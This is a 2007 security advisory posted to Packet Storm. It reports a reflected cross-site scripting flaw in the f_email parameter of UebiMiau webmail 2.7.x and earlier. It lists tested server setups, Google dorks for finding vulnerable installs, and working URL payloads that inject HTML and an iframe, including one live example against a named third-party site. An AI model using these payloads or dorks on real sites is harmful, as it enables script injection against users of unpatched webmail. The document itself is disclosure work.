UebiMiau versions 2.7.x and below suffer from a cross site scripting vulnerability due to the email variable not being sanitized.
79a84d3b963c093c2200fd851b69d2f931d4bb23f1b53a7c634509e2e368c560
Hi Packet Storm;
I want to report a vulnerability of type XSS in a Webmail, this is UebiMiau.
Thank you.
+===================================================================+
+ UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities +
+===================================================================+
Author(s): www.nullcode.com.ar
Product: UebiMiau WebMail.
Web: https://www.uebimiau.org/download.php
Versions: 2.7.x (or less)
Date: 03/10/2007
TESTED ON: UebiMiau WebMail 2.7.x (or less)
----------
[x] Apache/1.3.33 (Debian GNU/Linux) - PHP/4.3.10-19
[+] Apache/1.3.37 (Unix) - PHP/4.4.4
[+] Apache/1.3.37 (Unix) - PHP/5.2.1
[+] Apache/1.3.37 (Unix) - PHP/5.2.2
[+] Apache/2.0.53 (Fedora) - PHP/4.3.11
[+] Apache/2.0.55 (Unix) - PHP/5.2.0
[x] Apache/2.2.3 (Debian) - PHP/4.4.4-8+etch4
GOOGLE DORKS:
------------
[+] intext:Powered by UebiMiau!
[+] intitle:uebimiau
[+] inurl:/webmail/index.php?lid=
EXPLOIT:
--------
For example...after the variable "email"
index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS]
index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=="><h1>Null Code
Services</h1>="><iframe%20src=https://www.nullcode.com.ar/></iframe>
EXAMPLE (on line):
------------------
https://www.coffeeswirls.com/webmail/index.php?lid=6&tid=1&f_user=&six=&f_email==%22%3E%3Ch1%3ENull%20Code%20Services%3C/h1%3E=%22%3E%3Ciframe%20src=https://www.google.com/%3E%3C/iframe%3E
GREETS: str0ke, and to the same ones always from www.nullcode.com.ar ;)
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================+
+ UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities +
+===================================================================+
--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.